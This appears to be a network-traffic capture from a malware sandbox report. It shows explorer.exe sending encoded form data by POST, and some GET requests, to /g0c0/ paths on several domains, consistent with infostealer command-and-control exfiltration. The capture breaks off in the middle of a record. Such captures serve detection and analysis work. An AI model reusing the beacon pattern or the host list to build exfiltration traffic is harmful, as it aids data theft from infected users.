Mar 2, 2023 17:21:45.655917883 CET	1171	OUT	GET /g0c0/?J1ZahCdL=kWznJ2YswSL+LAAx9ZHUexIk0ycyRshautolqpnZVVrlJdt47ZaoNZmL7kdhIFbI+ihPlFcDQCWCpz3M8AfRW2Sbj71MdTjzXr3aV4lJwzwy&uEk=kKVhb1ODb HTTP/1.1 Host: www.xn--lst4d-fwa.site Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 2, 2023 17:21:45.876478910 CET	1172	IN	HTTP/1.1 404 Not Found Date: Thu, 02 Mar 2023 16:21:45 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Accept-Ranges: bytes CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=u%2FEGLGlM96ZICWdrskyIeI4gnuX4zCAjBSTamtS%2BsfMHI4LY3xuZ5JbmC%2F19kbY2mA01Qz%2BbPCkdLsc8s6aTagzYsKJN%2BhfkI6py0U%2F4LM3NUgyV5PiJuVyV%2FHYyOlsaAoFwEOtl5EbT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7a1af9805a6f693f-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 36 34 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 4d 65 74 61 20 2d 2d 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 31 32 30 30 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 31 32 30 30 22 3e 20 2d 2d 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 43 53 53 20 47 6c 6f 62 61 6c 20 43 6f 6d 70 75 6c 73 6f 72 79 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 77 65 62 2e 6d 69 6e 2e 63 73 73 22 3e 0a 20 20 20 20 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 77 65 62 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 6e 61 76 20 63 6c 61 Data Ascii: 649<!DOCTYPE html><html lang="en"><head> <title>404 PAGE NOT FOUND</title> ... Meta --> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta content="width=1200, initial-scale=1" name="viewport"> ... <meta content="viewport" content="width=1200"> --> <meta content="" name="description"> <meta content="" name="author"> ... Favicon --> <link rel="shortcut icon" href="favicon.ico"> ... CSS Global Compulsory --> <link rel="stylesheet" href="css/bootstrap.web.min.css"> <link href="css/responsiveweb.css" rel="stylesheet" type="text/css"></head><body><nav cla
Mar 2, 2023 17:21:45.876507044 CET	1173	IN	Data Raw: 73 73 3d 22 6e 61 76 62 61 72 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 68 65 61 64 65 72 22 3e 0a 20 20 20 20 20 20 3c 62 75 74 74 Data Ascii: ss="navbar"> <div class="container"> <div class="navbar-header"> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#myNavbar"> <span class="icon-bar"></span> <span class="icon-bar"></sp
Mar 2, 2023 17:21:45.876522064 CET	1173	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.6	49755	34.117.168.233	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 2, 2023 17:21:50.973714113 CET	1174	OUT	POST /g0c0/ HTTP/1.1 Host: www.ghostdyes.net Connection: close Content-Length: 194 Cache-Control: no-cache Origin: http://www.ghostdyes.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.ghostdyes.net/g0c0/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 4a 31 5a 61 68 43 64 4c 3d 79 65 77 72 65 48 62 48 32 2d 66 5a 52 49 38 6c 45 2d 61 63 36 52 4f 4c 37 56 38 30 4f 6f 78 63 48 6c 56 4c 6b 55 37 47 52 47 44 45 34 51 49 58 78 77 7a 69 54 47 68 70 76 64 44 74 76 4f 43 48 6b 6b 44 74 68 5a 79 74 44 7a 76 6d 4b 48 56 62 30 72 5a 41 54 41 62 59 61 4e 32 6b 67 53 63 49 47 43 44 74 6b 46 35 62 4d 71 77 6e 4d 33 67 34 4e 38 4c 37 52 30 36 52 5a 77 73 32 52 70 45 39 55 7a 34 78 4e 70 6b 6f 36 39 48 2d 34 78 46 48 52 59 61 36 47 42 4d 64 64 53 4e 62 78 45 78 74 28 4b 35 33 36 50 54 34 52 53 42 4c 4f 39 69 46 72 59 32 70 53 51 51 2e 00 00 00 00 00 00 00 00 Data Ascii: J1ZahCdL=yewreHbH2-fZRI8lE-ac6ROL7V80OoxcHlVLkU7GRGDE4QIXxwziTGhpvdDtvOCHkkDthZytDzvmKHVb0rZATAbYaN2kgScIGCDtkF5bMqwnM3g4N8L7R06RZws2RpE9Uz4xNpko69H-4xFHRYa6GBMddSNbxExt(K536PT4RSBLO9iFrY2pSQQ.
Mar 2, 2023 17:21:50.995425940 CET	1175	IN	HTTP/1.1 403 Forbidden Date: Thu, 02 Mar 2023 16:21:50 GMT Content-Type: text/html Content-Length: 146 X-Seen-By: GXNXSWFXisshliUcwO20NZL9Lwun+M+7c/tw2Pto8/GE9d7i1T1W+71T80GX3ARY,qquldgcFrj2n046g4RNSVLeuNqwcdH46iMA2Je1RdMI= X-Wix-Request-Id: 1677774110.97874751447016065 X-Content-Type-Options: nosniff Server: Pepyaka/1.19.10 Via: 1.1 google Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.6	49756	34.117.168.233	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 2, 2023 17:21:53.517451048 CET	1177	OUT	POST /g0c0/ HTTP/1.1 Host: www.ghostdyes.net Connection: close Content-Length: 1458 Cache-Control: no-cache Origin: http://www.ghostdyes.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.ghostdyes.net/g0c0/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 4a 31 5a 61 68 43 64 4c 3d 79 65 77 72 65 48 62 48 32 2d 66 5a 52 70 4d 6c 42 66 61 63 74 68 4f 55 30 31 38 30 56 59 78 51 48 6c 4a 4c 6b 56 28 57 52 55 50 45 35 48 45 58 78 53 62 69 44 32 68 70 72 74 44 70 67 75 44 47 6b 6b 47 65 68 63 57 54 44 31 33 6d 49 67 52 62 6c 2d 46 44 59 51 62 61 51 74 32 6e 67 53 63 64 47 44 7a 68 6b 46 39 39 4d 71 34 6e 4e 46 59 34 61 38 4c 38 4e 45 36 52 5a 77 73 41 52 70 45 42 55 7a 67 70 4e 6f 4d 34 39 4d 58 2d 37 51 6c 48 54 35 61 37 41 42 4d 5a 51 79 4d 72 7e 46 73 67 35 4b 30 57 31 64 6e 33 52 53 64 56 41 4b 44 78 30 37 6d 42 4e 6d 64 50 30 6b 6f 77 68 46 52 68 50 39 6c 70 36 47 62 6d 63 5f 6c 4c 7e 76 61 6f 37 55 39 75 72 78 39 56 59 47 46 49 55 43 76 57 62 41 52 47 62 45 6b 58 41 6e 63 77 55 4a 56 30 35 59 6d 64 4f 6d 4b 4a 46 4a 69 43 75 62 71 62 61 42 68 43 55 36 70 36 6b 76 64 4c 49 6a 52 4c 44 4f 67 36 59 31 77 43 71 6a 52 45 6b 4d 64 39 4a 4d 53 77 56 35 44 44 50 46 31 7a 78 41 56 73 4f 32 45 73 4a 46 74 69 68 44 35 6f 7a 77 6e 42 79 6f 65 32 54 51 78 72 35 78 68 32 46 31 39 30 59 42 36 55 6c 5a 51 45 75 41 45 36 64 6a 39 64 54 6d 45 72 69 32 4d 71 44 75 6c 73 58 47 66 45 4f 37 46 62 4c 34 77 4e 36 6b 59 31 57 54 39 76 37 41 52 76 31 62 68 2d 65 51 65 31 76 75 7e 30 66 67 6d 44 6c 55 36 51 77 4b 49 5f 54 57 7e 68 66 6d 76 31 76 64 54 56 5a 31 6d 6a 64 32 4e 39 6e 56 6a 64 72 4b 6d 30 74 38 4b 70 58 42 7a 70 32 69 6b 75 51 37 54 54 4c 54 79 32 34 67 50 43 43 30 4d 75 79 51 51 52 31 62 56 6f 50 4f 77 79 49 38 69 44 59 58 42 74 28 78 4a 74 61 4a 47 55 73 68 62 42 47 6c 42 49 58 38 74 43 72 62 6d 6b 72 65 4f 6c 5a 79 61 34 79 34 4d 71 68 43 6e 41 6b 33 6f 5f 42 38 73 6b 68 73 44 31 43 58 69 54 51 55 69 74 62 65 4b 79 49 6e 43 6d 52 66 6d 36 62 5f 61 4f 61 65 76 63 58 6e 43 72 59 68 52 36 4e 48 55 78 6b 6e 63 43 51 5f 48 63 6a 55 58 73 51 64 7e 4f 46 59 63 73 63 35 49 6f 36 6d 45 68 6e 61 7a 4e 31 7a 32 4e 32 72 74 58 6f 73 6d 42 77 51 50 42 68 71 56 4e 4c 34 44 64 61 38 57 54 42 58 51 7a 42 41 76 37 53 70 65 6f 53 6e 36 47 74 67 63 39 62 6a 4f 46 4f 43 6f 71 37 36 6b 35 76 48 61 2d 34 66 4c 4a 38 65 59 66 6d 4e 4f 4d 31 75 4a 45 72 43 6a 6d 69 64 4e 7a 77 72 57 58 43 48 71 75 56 4a 41 32 77 36 37 46 35 44 77 58 4e 61 53 62 4a 59 57 44 6a 41 70 45 70 5a 79 63 74 55 6a 71 69 57 42 68 63 34 77 76 6b 6a 34 34 4f 7a 4c 55 52 43 78 59 71 64 38 5f 62 64 59 62 71 64 6f 58 51 59 32 2d 70 33 28 4f 79 7a 76 36 58 7a 37 4b 44 6c 50 46 6d 46 41 65 7a 79 31 42 5a 67 78 33 6b 77 72 68 50 7a 74 30 43 48 6e 64 6a 64 43 69 6c 57 6c 79 4e 48 61 7a 4c 4e 6a 68 41 75 6b 48 63 74 32 6d 6b 37 56 6d 34 66 49 34 4d 31 75 6a 4b 64 73 56 28 58 4a 53 79 49 43 4c 61 71 35 2d 7a 4b 28 4d 67 37 69 44 39 34 31 5a 5a 43 72 50 7e 79 54 4c 74 67 65 55 46 6a 44 56 48 38 67 44 47 6e 77 74 61 61 36 32 67 78 73 78 76 65 39 6d 66 43 74 4d 35 50 6f 68 46 6b 6f 69 47 41 43 33 42 38 78 35 6b 68 32 37 6a 46 4e 64 43 46 47 71 34 34 31 38 67 47 47 66 33 45 61 7a 39 38 78 50 6f 5f 65 71 70 6a 56 67 48 45 6d 37 43 63 54 7a 61 5a 62 54 52 46 46 76 34 58 28 58 38 69 76 68 30 4b 36 38 7a 59 65 45 38 6d 46 5f 44 30 69 6d 34 53 77 34 63 52 37 49 37 65 4b 54 59 4b 66 74 28 2d 79 53 52 4b 6b 38 4f 75 58 5a 61 56 6b 50 4d 66 7e 50 66 77 34 48 78 4a 6c 42 66 44 4a 37 33 50 28 37 38 72 73 31 44 37 45 39 71 37 39 75 74 64 30 33 32 5a 64 34 69 53 73 5f 38 48 54 68 54 6f 72 6f 6c 45 31 5f 34 64 44 4a 35 72 57 52 4e 4f 41 56 56 65 7a 59 74 6a 50 58 5a 49 45 55 4f 6c 7a 7a 45 78 4a 6d 61 62 7a 72 6a 6a 4b 64 78 6f 34 5f 35 54 76 63 59 32 6a 33 76 77 58 48 69 31 72 62 65 33 33 36 63 56 48 54 4a 69 4b 47 63 75 6e 6c 38 66 34 38 76 54 35 4c 70 70 79 37 6f 55 6a 76 41 36 62 70 66 71 55 35 57 37 4a 79 55 43 44 4d 52 78 39 50 37 46 42 79 76 54 5a 50 4d 76 46 54 71 39 4c 79 58 70 6a 51 37 57 4d 63 77 62 6f 5a 75 6d 34 57 31 64 39 64 46 76 65 4e 73 48 71 78 4c 70 6d 73 39 50 28 6e 30 41 75 6e 50 37 64 54 42 56 6c 6a 44 4d 78 37 38 77 38 4e 59 6e 4a 33 59 6d 52 6b 51 54 53 4d 38 72 46 47 78 77 79 42 31 72 31 47 73 68 77 37 5a 57 46 69 47 57 28 69 4c 4f 66 52 77 4e 57 61 33 4b 38 35 74 7a 49 36 57 59 70 2d 57 2d 7a 68 62 69 73 76 52 43 36 45 44 61 Data Ascii: J1ZahCdL=yewreHbH2-fZRpMlBfacthOU0180VYxQHlJLkV(WRUPE5HEXxSbiD2hprtDpguDGkkGehcWTD13mIgRbl-FDYQbaQt2ngScdGDzhkF99Mq4nNFY4a8L8NE6RZwsARpEBUzgpNoM49MX-7QlHT5a7ABMZQyMr~Fsg5K0W1dn3RSdVAKDx07mBNmdP0kowhFRhP9lp6Gbmc_lL~vao7U9urx9VYGFIUCvWbARGbEkXAncwUJV05YmdOmKJFJiCubqbaBhCU6p6kvdLIjRLDOg6Y1wCqjREkMd9JMSwV5DDPF1zxAVsO2EsJFtihD5ozwnByoe2TQxr5xh2F190YB6UlZQEuAE6dj9dTmEri2MqDulsXGfEO7FbL4wN6kY1WT9v7ARv1bh-eQe1vu~0fgmDlU6QwKI_TW~hfmv1vdTVZ1mjd2N9nVjdrKm0t8KpXBzp2ikuQ7TTLTy24gPCC0MuyQQR1bVoPOwyI8iDYXBt(xJtaJGUshbBGlBIX8tCrbmkreOlZya4y4MqhCnAk3o_B8skhsD1CXiTQUitbeKyInCmRfm6b_aOaevcXnCrYhR6NHUxkncCQ_HcjUXsQd~OFYcsc5Io6mEhnazN1z2N2rtXosmBwQPBhqVNL4Dda8WTBXQzBAv7SpeoSn6Gtgc9bjOFOCoq76k5vHa-4fLJ8eYfmNOM1uJErCjmidNzwrWXCHquVJA2w67F5DwXNaSbJYWDjApEpZyctUjqiWBhc4wvkj44OzLURCxYqd8_bdYbqdoXQY2-p3(Oyzv6Xz7KDlPFmFAezy1BZgx3kwrhPzt0CHndjdCilWlyNHazLNjhAukHct2mk7Vm4fI4M1ujKdsV(XJSyICLaq5-zK(Mg7iD941ZZCrP~yTLtgeUFjDVH8gDGnwtaa62gxsxve9mfCtM5PohFkoiGAC3B8x5kh27jFNdCFGq4418gGGf3Eaz98xPo_eqpjVgHEm7CcTzaZbTRFFv4X(X8ivh0K68zYeE8mF_D0im4Sw4cR7I7eKTYKft(-ySRKk8OuXZaVkPMf~Pfw4HxJlBfDJ73P(78rs1D7E9q79utd032Zd4iSs_8HThTorolE1_4dDJ5rWRNOAVVezYtjPXZIEUOlzzExJmabzrjjKdxo4_5TvcY2j3vwXHi1rbe336cVHTJiKGcunl8f48vT5Lppy7oUjvA6bpfqU5W7JyUCDMRx9P7FByvTZPMvFTq9LyXpjQ7WMcwboZum4W1d9dFveNsHqxLpms9P(n0AunP7dTBVljDMx78w8NYnJ3YmRkQTSM8rFGxwyB1r1Gshw7ZWFiGW(iLOfRwNWa3K85tzI6WYp-W-zhbisvRC6EDauSUUnvZWNSgkSwPAwX5AHdCzWNjjxq38nh6WcH6P7S7_6Z8nvxDukWUzNbd5XBbkLcKlXSmQzB~FS6gGqNfVQO6i6P0A4.
Mar 2, 2023 17:21:53.539091110 CET	1178	IN	HTTP/1.1 403 Forbidden Date: Thu, 02 Mar 2023 16:21:53 GMT Content-Type: text/html Content-Length: 146 X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMf498VbANTSyYg//oIwpa8Y,qquldgcFrj2n046g4RNSVCA9lUGGSSQQI3tXitet/XU= X-Wix-Request-Id: 1677774113.52213035266526042 X-Content-Type-Options: nosniff Server: Pepyaka/1.19.10 Via: 1.1 google Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.6	49757	34.117.168.233	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 2, 2023 17:21:56.066778898 CET	1179	OUT	GET /g0c0/?J1ZahCdL=/cYLdyO2qITEXYcdEKysiTG/0kILWa8EGExoyl7LQW7KzQM/3grhKHlpqc3WrobEjk7g5cW8f2voA2pa0pIYVA7MQ8uZkEgdBjrf6G57J+B7&uEk=kKVhb1ODb HTTP/1.1 Host: www.ghostdyes.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 2, 2023 17:21:56.136593103 CET	1180	IN	HTTP/1.1 404 Not Found Date: Thu, 02 Mar 2023 16:21:56 GMT Content-Type: text/html; charset=utf-8 Content-Length: 2963 x-wix-request-id: 1677774116.07413035592126042 Age: 0 X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMf498VbANTSyYg//oIwpa8Y,qquldgcFrj2n046g4RNSVIrig9SAqnXW0O7zAzsQkQs=,2d58ifebGbosy5xc+FRalr1+BTbbk8D/C5Mj17Sq3GDgFNWdrlR/j32y+D/b+k++joe2GMQJ/MdiMK4Y/vI70/GYpY0jwc2V0ffjEpF8ZOk=,2UNV7KOq4oGjA5+PKsX47MyzModdCYt257tfZB2IvZxWd3xniMsr1HjrszKGvMzr,7npGRUZHWOtWoP0Si3wDpw1wmR8v3iHU/pyGyiJHHXY=,xTu8fpDe3EKPsMR1jrheEDJBjhpMsaSI5Xx0GIEXrE4=,j1W3GTXLqH1rFP/nP6vn5ns+IeiSlzRme4LwF8AtwyR2DhA9JtxScVH1G7jz1MP6CONUzZLbexpS3PEZaUF96g== Vary: Accept-Encoding server-timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw3_g X-Content-Type-Options: nosniff Server: Pepyaka/1.19.10 Via: 1.1 google Connection: close Data Raw: 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e Data Ascii: ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' \| translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="robots" content="n
Mar 2, 2023 17:21:56.136645079 CET	1181	IN	Data Raw: 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 77 69 78 2e 63 6f 6d 2f 66 61 76 69 Data Ascii: oindex, nofollow"> ... --> <link type="image/png" href="//www.wix.com/favicon.ico" rel="shortcut icon"> ... --> <link href="//static.parastorage.com/services/third-party/fonts/Helvetica/fontFace.css" rel="stylesheet" type="text/c
Mar 2, 2023 17:21:56.136665106 CET	1183	IN	Data Raw: 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 32 39 39 2e 30 2f 73 63 72 69 70 74 73 2f 65 72 72 6f 72 2d 70 61 67 65 73 2f 6c 6f 63 61 6c 65 2f 6d 65 73 73 61 67 65 73 5f 65 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 Data Ascii: com/services/wix-public/1.299.0/scripts/error-pages/locale/messages_en.js"></script> ... --><script src="//static.parastorage.com/services/wix-public/1.299.0/scripts/error-pages/app.js"></script> ... --><script> angular.module('wi

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.6	49758	212.227.172.253	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 2, 2023 17:22:01.202332973 CET	1184	OUT	POST /g0c0/ HTTP/1.1 Host: www.julesgifts.co.uk Connection: close Content-Length: 194 Cache-Control: no-cache Origin: http://www.julesgifts.co.uk User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.julesgifts.co.uk/g0c0/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 4a 31 5a 61 68 43 64 4c 3d 47 74 41 72 41 30 4c 64 41 32 4d 63 6b 52 77 36 45 44 52 73 67 61 34 59 53 6e 6f 35 69 6d 77 5f 7e 33 39 38 69 74 6f 62 4a 52 39 5a 65 36 68 65 46 49 71 70 4b 37 58 35 6f 58 66 4d 28 51 42 66 41 6d 55 35 56 56 41 36 45 54 31 64 44 51 34 44 6e 76 49 61 56 76 77 5a 79 50 63 59 56 59 7e 70 4b 65 71 5f 46 4f 6a 75 37 57 55 42 34 55 28 7a 64 6b 30 6a 4b 2d 65 49 4f 69 7e 54 64 31 77 68 64 5f 6a 47 6f 37 49 51 62 34 63 59 39 78 4d 50 5a 6b 44 51 41 7a 58 4f 50 53 61 39 61 79 39 37 37 42 28 62 4e 79 69 55 76 43 68 68 31 63 6b 48 28 59 35 4c 62 55 4d 2e 00 00 00 00 00 00 00 00 Data Ascii: J1ZahCdL=GtArA0LdA2MckRw6EDRsga4YSno5imw_~398itobJR9Ze6heFIqpK7X5oXfM(QBfAmU5VVA6ET1dDQ4DnvIaVvwZyPcYVY~pKeq_FOju7WUB4U(zdk0jK-eIOi~Td1whd_jGo7IQb4cY9xMPZkDQAzXOPSa9ay977B(bNyiUvChh1ckH(Y5LbUM.
Mar 2, 2023 17:22:01.219765902 CET	1185	IN	HTTP/1.1 302 Moved Temporarily Server: nginx Date: Thu, 02 Mar 2023 16:22:01 GMT Content-Type: text/html Content-Length: 138 Connection: close Location: https://www.julesgifts.co.uk/g0c0/ Expires: Thu, 02 Mar 2023 16:42:01 GMT Cache-Control: max-age=1200 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.6	49728	172.217.168.65	443	C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.2.6	49759	212.227.172.253	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 2, 2023 17:22:03.769668102 CET	1187	OUT	POST /g0c0/ HTTP/1.1 Host: www.julesgifts.co.uk Connection: close Content-Length: 1458 Cache-Control: no-cache Origin: http://www.julesgifts.co.uk User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.julesgifts.co.uk/g0c0/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 4a 31 5a 61 68 43 64 4c 3d 47 74 41 72 41 30 4c 64 41 32 4d 63 6d 78 67 36 48 67 70 73 78 36 34 66 4f 58 6f 35 37 32 77 37 7e 32 42 38 69 73 63 4c 4a 6e 6c 5a 64 70 5a 65 46 71 43 70 49 37 58 35 35 48 66 49 77 77 42 56 41 6d 70 41 56 55 77 71 45 58 52 64 